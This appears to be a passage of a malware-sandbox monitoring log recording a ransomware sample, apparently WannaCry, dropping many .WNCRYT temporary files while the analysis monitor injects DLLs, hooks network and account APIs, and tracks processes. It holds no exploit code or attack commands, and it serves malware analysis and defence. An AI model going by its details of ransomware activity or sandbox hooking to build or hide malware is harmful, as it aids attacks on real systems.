2025-12-08 09:09:40,156 [root] DEBUG: 1892: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:40,156 [root] DEBUG: 2532: DLL loaded at 0x000007FEFB9F0000: C:\Windows\system32\uxtheme (0x56000 bytes).
2025-12-08 09:09:40,156 [root] DEBUG: 1892: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x140000
2025-12-08 09:09:40,171 [root] INFO: Loaded monitor into process with pid 1892
2025-12-08 09:09:40,171 [root] DEBUG: 1892: caller_dispatch: Added region at 0x007F0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x007F1457, thread 2464).
2025-12-08 09:09:40,171 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\108.WNCRYT to files\1ef4d476e4b3b417deacfdb21a7e002032f07c9231f2b42aa2dd8bcabc9f95bd; Size is 22708; Max size: 100000000
2025-12-08 09:09:40,171 [root] DEBUG: 1892: YaraScan: Scanning 0x007F0000, size 0x518e8
2025-12-08 09:09:40,171 [root] DEBUG: 1892: ProcessImageBase: Main module image at 0x007F0000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:40,171 [root] DEBUG: 2532: DLL loaded at 0x000007FEF2DA0000: C:\Windows\system32\thumbcache (0x1f000 bytes).
2025-12-08 09:09:40,171 [root] DEBUG: 2532: DLL loaded at 0x000007FEFECB0000: C:\Windows\system32\SHELL32 (0xd8b000 bytes).
2025-12-08 09:09:40,171 [root] DEBUG: 1892: NtTerminateProcess hook: Attempting to dump process 1892
2025-12-08 09:09:40,171 [root] DEBUG: 2532: DLL loaded at 0x000007FEFA740000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\COMCTL32 (0xa0000 bytes).
2025-12-08 09:09:40,171 [root] DEBUG: 1892: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:40,171 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\109.WNCRYT to files\ed29b286399e265de1b07eb7c5ec0f3d88ecedbf634e41ba979015e7b9c90b40; Size is 16717; Max size: 100000000
2025-12-08 09:09:40,187 [root] DEBUG: 2532: DLL loaded at 0x0000000077910000: C:\Windows\system32\PSAPI (0x7000 bytes).
2025-12-08 09:09:40,187 [root] INFO: Process with pid 1892 has terminated
2025-12-08 09:09:40,187 [root] DEBUG: 2532: DLL loaded at 0x000007FEFBAA0000: C:\Windows\system32\PROPSYS (0x12c000 bytes).
2025-12-08 09:09:40,187 [root] DEBUG: 2948: NtTerminateProcess hook: Attempting to dump process 2948
2025-12-08 09:09:40,187 [root] DEBUG: 2532: DLL loaded at 0x000007FEF2DC0000: C:\Windows\system32\PhotoMetadataHandler (0x6b000 bytes).
2025-12-08 09:09:40,187 [root] DEBUG: 2948: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:40,187 [root] INFO: Process with pid 2948 has terminated
2025-12-08 09:09:40,187 [root] DEBUG: 2532: DLL loaded at 0x000007FEFB320000: C:\Windows\system32\WindowsCodecs (0x161000 bytes).
2025-12-08 09:09:40,187 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\11.WNCRYT to files\8374535e147ab71b9f149e74e77fccf3282ffa9257565cd4af6db471c47e9231; Size is 6343; Max size: 100000000
2025-12-08 09:09:40,203 [root] DEBUG: 2532: set_hooks_by_export_directory: Hooked 0 out of 606 functions
2025-12-08 09:09:40,218 [root] DEBUG: 2532: DLL loaded at 0x000007FEF9120000: C:\Windows\system32\actxprxy (0xee000 bytes).
2025-12-08 09:09:40,218 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\110.WNCRYT to files\6ce4eb18dc1e2a185bd093dbf7ec51dc0bce5c5c5e106ff436fe99a2daef44e0; Size is 15855; Max size: 100000000
2025-12-08 09:09:40,234 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\111.WNCRYT to files\91fa72c7759c99220131fba145dc7609d5eb381130ef2f65e4c35b0142a2c7f1; Size is 14768; Max size: 100000000
2025-12-08 09:09:40,265 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\112.WNCRYT to files\d5cc7c6edda7d7065a08f5a4212fbb2e1c8b7cbae2df0d9b2901955355c332d2; Size is 15437; Max size: 100000000
2025-12-08 09:09:40,281 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\113.WNCRYT to files\251210371b121b5a8f8a1a755b000bac841c6ba5c5844fe002eb95d6ec6f1818; Size is 14370; Max size: 100000000
2025-12-08 09:09:40,296 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\114.WNCRYT to files\d515760e0903a357b54ff262d04ca99d721d555d8c5335f6ee91804f09e6adff; Size is 15053; Max size: 100000000
2025-12-08 09:09:40,312 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\115.WNCRYT to files\2df1b0bc5070aabba54d99d740ad44807bd60336946209551bed0c00abc94d71; Size is 14151; Max size: 100000000
2025-12-08 09:09:40,328 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\116.WNCRYT to files\ca6a99eb76f7182885eb6b208e418c665969198dc9370365c01cf7a233a00c12; Size is 15483; Max size: 100000000
2025-12-08 09:09:40,359 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\117.WNCRYT to files\840e2d448c39a8f34e92f6769948d3b798ae908e1d7b7b7ea0385757d5cd6ec8; Size is 15306; Max size: 100000000
2025-12-08 09:09:40,375 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\118.WNCRYT to files\33f60f162fad18a21ca22656951b9a70d537c28601851618a8ba77bf180131f7; Size is 13212; Max size: 100000000
2025-12-08 09:09:40,468 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\119.WNCRYT to files\3afcde87678a9d66d80f3416082609252d1688035750bdbfa2306465b19f005b; Size is 13490; Max size: 100000000
2025-12-08 09:09:40,468 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\12.WNCRYT to files\3be9621f436874877d799a19ea638955616ef2b5b20a121c3e2105a82569d83c; Size is 17981; Max size: 100000000
2025-12-08 09:09:40,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\120.WNCRYT to files\be303c93bbc19ec7fbc8de40f1df67a325babc3425cd8773544c0a4ffdda516e; Size is 13288; Max size: 100000000
2025-12-08 09:09:40,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\121.WNCRYT to files\4a529eecfc789e2ae02fb0daaf3902dad59447eaf4f3ef5ecf6a4b7ab61bfadf; Size is 14912; Max size: 100000000
2025-12-08 09:09:40,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\122.WNCRYT to files\8b4339cbaae6ba024547d28e611b61df0b4b60837445609afef9024de1c05f4f; Size is 13540; Max size: 100000000
2025-12-08 09:09:40,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\123.WNCRYT to files\508c5fc5b7ba01458fb0f176230538dbd3d206fbfd1b9afdb57998e4508aff82; Size is 14359; Max size: 100000000
2025-12-08 09:09:40,546 [root] DEBUG: 1144: DLL loaded at 0x71DF0000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2025-12-08 09:09:40,546 [root] DEBUG: 1144: hook_api: Warning - NetUserGetInfo export address 0x7194528E differs from GetProcAddress -> 0x71DF1BE2 (SAMCLI.DLL::0x1be2)
2025-12-08 09:09:40,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\124.WNCRYT to files\068d9ceeaa449f7e4ed93e45d4244a6dc3a14ab40db36681d7dfacaf607283bb; Size is 13186; Max size: 100000000
2025-12-08 09:09:40,546 [root] DEBUG: 1144: DLL loaded at 0x71930000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2025-12-08 09:09:40,562 [root] DEBUG: 1144: hook_api: Warning - NetGetJoinInformation export address 0x71944AD2 differs from GetProcAddress -> 0x71932C3F (WKSCLI.DLL::0x2c3f)
2025-12-08 09:09:40,562 [root] DEBUG: 1144: hook_api: Warning - NetUserGetLocalGroups export address 0x719452A4 differs from GetProcAddress -> 0x71DF28AA (SAMCLI.DLL::0x28aa)
2025-12-08 09:09:40,562 [root] DEBUG: 1144: DLL loaded at 0x717C0000: C:\Windows\system32\LOGONCLI (0x22000 bytes).
2025-12-08 09:09:40,562 [root] DEBUG: 1144: hook_api: Warning - DsEnumerateDomainTrustsW export address 0x71943C9E differs from GetProcAddress -> 0x717CB202 (LOGONCLI.DLL::0xb202)
2025-12-08 09:09:40,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\125.WNCRYT to files\4f811c8a787548430c60d16731d60d2cc4f78f7edf37d294ead130d6d32dda27; Size is 22751; Max size: 100000000
2025-12-08 09:09:40,562 [root] DEBUG: 1144: DLL loaded at 0x71940000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2025-12-08 09:09:40,562 [root] DEBUG: 1144: DLL loaded at 0x717B0000: C:\Windows\system32\netutils (0x9000 bytes).
2025-12-08 09:09:40,562 [root] DEBUG: 1144: DLL loaded at 0x71790000: C:\Windows\system32\srvcli (0x19000 bytes).
2025-12-08 09:09:40,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\126.WNCRYT to files\2c7687588614b3e20585be3da54c116a97ae8c79399eca88bd2e971890ff4d92; Size is 13918; Max size: 100000000
2025-12-08 09:09:40,734 [root] DEBUG: 1144: DLL loaded at 0x73BE0000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2025-12-08 09:09:40,734 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\127.WNCRYT to files\fbaaa79c0f7ddbfd8e678a2d86186563fc6f5b2ac431185a277c18edf3069b38; Size is 14088; Max size: 100000000
2025-12-08 09:09:40,734 [root] DEBUG: 1144: DLL loaded at 0x73BD0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 09:09:40,734 [root] DEBUG: 1144: DLL loaded at 0x73BC0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2025-12-08 09:09:40,734 [root] DEBUG: 1144: DLL loaded at 0x73BA0000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2025-12-08 09:09:40,734 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\128.WNCRYT to files\a2c33e25ed57f6fc97ddd2bce59b170e6d75095b0e2306511c5b10cb6ff2648f; Size is 14730; Max size: 100000000
2025-12-08 09:09:40,734 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\129.WNCRYT to files\8ac242e89f501c98bb0ff860096d60e51ec088a6421012354939c0380f13e47f; Size is 13586; Max size: 100000000
2025-12-08 09:09:40,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\13.WNCRYT to files\824c88479ff2a887e23838a03bd41c5c6f5c20f9cd3031ff2b2897529a1f39f6; Size is 17193; Max size: 100000000
2025-12-08 09:09:40,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\130.WNCRYT to files\4cc14a2f63c83bb26eb96aaa839417378dda11aabf22f2e9e58f4b4205dc80ae; Size is 13569; Max size: 100000000
2025-12-08 09:09:40,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\131.WNCRYT to files\3fd953a5bbf7dc06bd325097b25378a5064646915b0a76b48bb9081c03f90566; Size is 15850; Max size: 100000000
2025-12-08 09:09:40,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\132.WNCRYT to files\7aabb89f542b05ec9dafca66a4ec84e8afa8c4cc2bbf27b3ef5b1eaa55cd15aa; Size is 14849; Max size: 100000000
2025-12-08 09:09:40,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\133.WNCRYT to files\042d616e6045f69d4ccd1ddc7a4333593651cc87de9fe9d622e7a80215d38172; Size is 13355; Max size: 100000000
2025-12-08 09:09:40,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\134.WNCRYT to files\dcae6c33ca77ec861e15c723d1e0901ec501c4c0b041894119bf1a4a282f753d; Size is 13357; Max size: 100000000
2025-12-08 09:09:40,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\135.WNCRYT to files\b3b918f11735bb8da6f4c348eb4a27324d436308fe72a6c5005fe1a87a4dcccb; Size is 15325; Max size: 100000000
2025-12-08 09:09:40,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\136.WNCRYT to files\555cc01fbdd6c0d5cfa920ef11a292858226285b32ab485430486d0c0f10efa8; Size is 18434; Max size: 100000000
2025-12-08 09:09:40,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\137.WNCRYT to files\71a8d8910389c17da1784eb8dd0445a059c866ed848947c9ac67ac498610fced; Size is 22265; Max size: 100000000
2025-12-08 09:09:40,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\138.WNCRYT to files\a547c665673a1e980d8ee25f68f3cc46dabcf8f31de2f47cf894867b338c65a8; Size is 14595; Max size: 100000000
2025-12-08 09:09:40,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\139.WNCRYT to files\e216dcd0e00dd6b782d3d5c804000d1f5bb68e5448ddab9547f9b96984cb1cdf; Size is 13513; Max size: 100000000
2025-12-08 09:09:40,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\14.WNCRYT to files\d6547d3047f7b606cf84ccbed44c5047c0e3f6feecfeb7f0a87ee451fc2ff7a7; Size is 5965; Max size: 100000000
2025-12-08 09:09:40,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\140.WNCRYT to files\402c85f712a979f464d903d215c134724198c3989e5133384fda19b4cfbb379c; Size is 13833; Max size: 100000000
2025-12-08 09:09:40,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\141.WNCRYT to files\78c15f5425d0ef226459144857df3127cb46d7dbc12dfda249115f54423b2d3b; Size is 14299; Max size: 100000000
2025-12-08 09:09:40,796 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\142.WNCRYT to files\40f23a847431b91debb34d8cece957f8989150c87506508f8b55e5cc990e9bcb; Size is 13301; Max size: 100000000
2025-12-08 09:09:40,796 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\143.WNCRYT to files\257bc3fc77b76f5056709aebf0118350c3394645681c521bdd01619d673986be; Size is 13763; Max size: 100000000
2025-12-08 09:09:40,796 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\144.WNCRYT to files\61bb1c407345bb9f1134240690116859a275658cd203830eae173b56f2e47397; Size is 14930; Max size: 100000000
2025-12-08 09:09:40,796 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\145.WNCRYT to files\c1ea2d212e30c1875f8b8f4d7753b03bb93761507cd9db181893d74d090e30a0; Size is 13286; Max size: 100000000
2025-12-08 09:09:40,812 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\146.WNCRYT to files\055979b4c5e063763fe761716f927edabcfdb2c847af593aa4dd86f18f6ed706; Size is 13757; Max size: 100000000
2025-12-08 09:09:40,828 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\147.WNCRYT to files\4c9da326ce6d9168a0ee5fa82a4a55c8719237bfd3c042d9e5293caa85189c66; Size is 13367; Max size: 100000000
2025-12-08 09:09:40,828 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\148.WNCRYT to files\956d4a24e64b1b6642490074b09371927f9663d55b568ee66b3f06fcee587215; Size is 20897; Max size: 100000000
2025-12-08 09:09:40,828 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\149.WNCRYT to files\f7c9c9375742e7b9d4efcc76c2b4872e1df7626b38490fe8147e19fa7ff19c5f; Size is 15560; Max size: 100000000
2025-12-08 09:09:40,875 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\15.WNCRYT to files\91d3d81f8e0663200d4a6fa6689cc6936c50db001514fe803a638b861196997a; Size is 5649; Max size: 100000000
2025-12-08 09:09:40,875 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\150.WNCRYT to files\2b93d825fe94338fa370b615fe66e6748f475dcb3077e646a9a3719cfb5ad7db; Size is 13711; Max size: 100000000
2025-12-08 09:09:40,875 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\151.WNCRYT to files\da3b69fcd64924d884bbbedbba1b5848c7046f5093ed95c61e0b0524dc4ba94e; Size is 20367; Max size: 100000000
2025-12-08 09:09:40,875 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\152.WNCRYT to files\3fdf3fa385c266a75ef597568a30f2f5abe4fd4a1f8119b6cd70f325d4e61abb; Size is 20860; Max size: 100000000
2025-12-08 09:09:40,906 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\153.WNCRYT to files\f8b586c8a6c53d14b188978d797491f8e5edc5f0113726a8ac13b2905e74fc2e; Size is 15561; Max size: 100000000
2025-12-08 09:09:40,906 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\154.WNCRYT to files\21fad4c90b9b782418c6e56d74244998f387ee9f8148b65fa8641575632adbd0; Size is 14169; Max size: 100000000
2025-12-08 09:09:40,906 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\155.WNCRYT to files\00a8087fe33f64509e6e075fffe4241863b9e234faf9565ff1f8f63f67318eaf; Size is 17029; Max size: 100000000
2025-12-08 09:09:40,921 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\156.WNCRYT to files\460a6609e5dc7d054fe549411bb3152987029850ca0d105d796e4984914783a0; Size is 13338; Max size: 100000000
2025-12-08 09:09:41,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\157.WNCRYT to files\3bd6b4a00d3e6f8a5314f4cc781cb21c0424ff5ed4addad39c9e14bfcae87f08; Size is 20179; Max size: 100000000
2025-12-08 09:09:41,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\158.WNCRYT to files\ed10f374908af49cc2b2c02d1b0883275298ce12a4f2624371b9e6feff027aa3; Size is 14198; Max size: 100000000
2025-12-08 09:09:41,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\159.WNCRYT to files\9b251737a6b6ace9fde45b64fd653b04575c6416f15112fbe1697a47b14990e6; Size is 2340; Max size: 100000000
2025-12-08 09:09:41,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\16.WNCRYT to files\0e931904c4c9bede08bee5985a5912351efb927787941e33e174ec9373f81476; Size is 7595; Max size: 100000000
2025-12-08 09:09:41,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\160.WNCRYT to files\2d18fbba6ac5fa6229064d447c20d9926624318b8b128511b6825799c9cc56bb; Size is 1175; Max size: 100000000
2025-12-08 09:09:41,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\161.WNCRYT to files\445c1bcb9a77662da86169cd4ecaba80bfeeee58b509b50b97a81d8c8bcaa2ea; Size is 4419; Max size: 100000000
2025-12-08 09:09:41,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\162.WNCRYT to files\44526b5d7587edd75e682fff9fae8bc31fc9eb38f4e94375914384428d3b2c3d; Size is 3784; Max size: 100000000
2025-12-08 09:09:41,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\163.WNCRYT to files\361c6e9b74fc24bf9acc411190c45e548110459775fc9a0e3ded56e5e4104aa2; Size is 2446; Max size: 100000000
2025-12-08 09:09:41,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\164.WNCRYT to files\e2cd6caadf312cf274f602d7f94143a16c14a029eafc16141f65071ea24903b7; Size is 2108; Max size: 100000000
2025-12-08 09:09:41,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\165.WNCRYT to files\9fb5575b8b63d062272f598157fb15898b322d75d9d87a403bcab34120849cea; Size is 1806; Max size: 100000000
2025-12-08 09:09:41,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\166.WNCRYT to files\a6f6c78f7d232ca147fbd84cfed52a1ae1f3283f83e905ecf9bf5a923e27aa11; Size is 3346; Max size: 100000000
2025-12-08 09:09:41,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\167.WNCRYT to files\cb1a1c056842a3269b539e672bad485caa615941c08c4a70ccc8dcb8954e38d9; Size is 1273; Max size: 100000000
2025-12-08 09:09:41,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\168.WNCRYT to files\c2a514ddb082bd4c1d79d570efb760583f324cc1a63961fad1b8059fd8afbfc3; Size is 2216; Max size: 100000000
2025-12-08 09:09:41,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\169.WNCRYT to files\409daed00ece17bace5809f95a642455956de49db602873800149c2a53579f95; Size is 1351; Max size: 100000000
2025-12-08 09:09:41,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\17.WNCRYT to files\f714f0963e1ce7c6a73b27585eb6b197e29875e195b97885737817e51ded42ad; Size is 6166; Max size: 100000000
2025-12-08 09:09:41,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\170.WNCRYT to files\8eb487d51e3879f21035828878e463438a15032b1deb4018b3583ef60a92afbf; Size is 1853; Max size: 100000000
2025-12-08 09:09:41,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\171.WNCRYT to files\a7e432146b2195a79875b6ac1ad82eddf40efec79122ee41a68c68577e5d03ec; Size is 1987; Max size: 100000000
2025-12-08 09:09:41,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\172.WNCRYT to files\415347341d6b98c59872de4450a4c69b358f57a223c8feb8850ce6a03f95d139; Size is 3772; Max size: 100000000
2025-12-08 09:09:41,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\173.WNCRYT to files\4c624f0c6a5b26afafb613ea08b56123e25bd87ec1288af3d7d3446e55e7a576; Size is 9501; Max size: 100000000
2025-12-08 09:09:41,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\174.WNCRYT to files\e94a8bad46f1942c70be2b67201abcbbe1d2cacbf451b7c7466f9e3eb0b2d4ad; Size is 8129; Max size: 100000000
2025-12-08 09:09:41,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\175.WNCRYT to files\d3ae37280b16044522f43d136c64411dd233168c60428220ffe3b0f48809aec7; Size is 52106; Max size: 100000000
2025-12-08 09:09:41,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\176.WNCRYT to files\b3d50fc13e52e8ccd2f6b0ab5adb2497739a260a354d2af1c2e641220f8bbd8f; Size is 8421; Max size: 100000000
2025-12-08 09:09:41,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\177.WNCRYT to files\3b6218d7d367bcb8cf7c4e445141de89aa2530e9026a96b6c56f1642bdf68ef5; Size is 15886; Max size: 100000000
2025-12-08 09:09:41,578 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\178.WNCRYT to files\fc9dd59f60210011a518ff8c5a3b894f444f93eb24a7305fdaa2c6f2b7a6fb11; Size is 1485; Max size: 100000000
2025-12-08 09:09:41,578 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\179.WNCRYT to files\5dc84c29d01165fd813a74c0890da58ed32ffeb2cd1913a30ea38d0f243cee99; Size is 16467; Max size: 100000000
2025-12-08 09:09:41,593 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\18.WNCRYT to files\1ea50fa040f7fe2e420039646c1a3f6f99756d7b1159ce1002a148c639761650; Size is 17877; Max size: 100000000
2025-12-08 09:09:41,593 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\180.WNCRYT to files\4c3b09ff1dbf607b049e371f9ab3c1f82b35d4662b5b964d03659b701afdad9b; Size is 26459; Max size: 100000000
2025-12-08 09:09:41,593 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\181.WNCRYT to files\cc6ff28e4e632f6c8e11af6d6b322d3406eee2fd04409f04001add8578141145; Size is 14697; Max size: 100000000
2025-12-08 09:09:41,593 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\182.WNCRYT to files\bac3a3fec315edad6d655173ae4ed87823c5acb88a8810ff209e315b32003437; Size is 24450; Max size: 100000000
2025-12-08 09:09:41,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\183.WNCRYT to files\7deffc2b6991e8e562894d74b3174d83eb6cf8734797e3440231e161c1ab43a0; Size is 15636; Max size: 100000000
2025-12-08 09:09:41,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\184.WNCRYT to files\7faf50b77b903b2748e289acbaf72d8e5addc31f303d26e475c8cd0e44dd4303; Size is 23935; Max size: 100000000
2025-12-08 09:09:41,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\185.WNCRYT to files\63a23a37ed630c3500de889e99cc2d458b9c97e72d4aa03a1239f685de43d6bc; Size is 29453; Max size: 100000000
2025-12-08 09:09:41,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\186.WNCRYT to files\71b6766f321e318f09b67b1dbc869cf7ecfc66f559d1ea9555bc51009373aff3; Size is 17069; Max size: 100000000
2025-12-08 09:09:41,625 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\187.WNCRYT to files\a2efa14f7a3d6566b350b2e99060466979403c882fcaa4a3208236790eb7b7d9; Size is 15006; Max size: 100000000
2025-12-08 09:09:41,625 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\188.WNCRYT to files\80c6c06ce451a42b8b69aec74216bf8c2264ceb6655de2eab69168275d2bacff; Size is 20892; Max size: 100000000
2025-12-08 09:09:41,765 [root] DEBUG: 2348: NtTerminateProcess hook: Attempting to dump process 2348
2025-12-08 09:09:41,765 [root] DEBUG: 2348: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:41,765 [root] INFO: Process with pid 2348 has terminated
2025-12-08 09:09:45,546 [root] INFO: Process with pid 2532 has terminated
2025-12-08 09:09:45,546 [root] DEBUG: 2532: NtTerminateProcess hook: Attempting to dump process 2532
2025-12-08 09:09:45,546 [root] DEBUG: 2532: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:47,296 [root] DEBUG: 2124: CreateProcessHandler: Injection info set for new process 2460: C:\Windows\system32\cmd.exe, ImageBase: 0x4A620000
2025-12-08 09:09:47,296 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2460
2025-12-08 09:09:47,296 [lib.api.process] INFO: Monitor config for <Process 2460 cmd.exe>: C:\tmp2azv04x4\dll\2460.ini
2025-12-08 09:09:47,296 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:47,312 [root] DEBUG: Loader: Injecting process 2460 (thread 960) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,312 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:47,312 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,312 [lib.api.process] INFO: Injected into 32-bit <Process 2460 cmd.exe>
2025-12-08 09:09:47,312 [root] DEBUG: 2124: DLL loaded at 0x73910000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 09:09:47,312 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2460
2025-12-08 09:09:47,312 [lib.api.process] INFO: Monitor config for <Process 2460 cmd.exe>: C:\tmp2azv04x4\dll\2460.ini
2025-12-08 09:09:47,312 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:47,328 [root] DEBUG: Loader: Injecting process 2460 (thread 960) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,328 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:47,328 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,328 [lib.api.process] INFO: Injected into 32-bit <Process 2460 cmd.exe>
2025-12-08 09:09:47,328 [root] DEBUG: 2124: NtTerminateProcess hook: Attempting to dump process 2124
2025-12-08 09:09:47,328 [root] DEBUG: 2124: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:47,343 [root] INFO: Process with pid 2124 has terminated
2025-12-08 09:09:47,343 [root] DEBUG: 2460: Python path set to 'C:\Python38'.
2025-12-08 09:09:47,343 [root] DEBUG: 2460: Dropped file limit defaulting to 100.
2025-12-08 09:09:47,343 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:47,343 [root] DEBUG: 2460: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
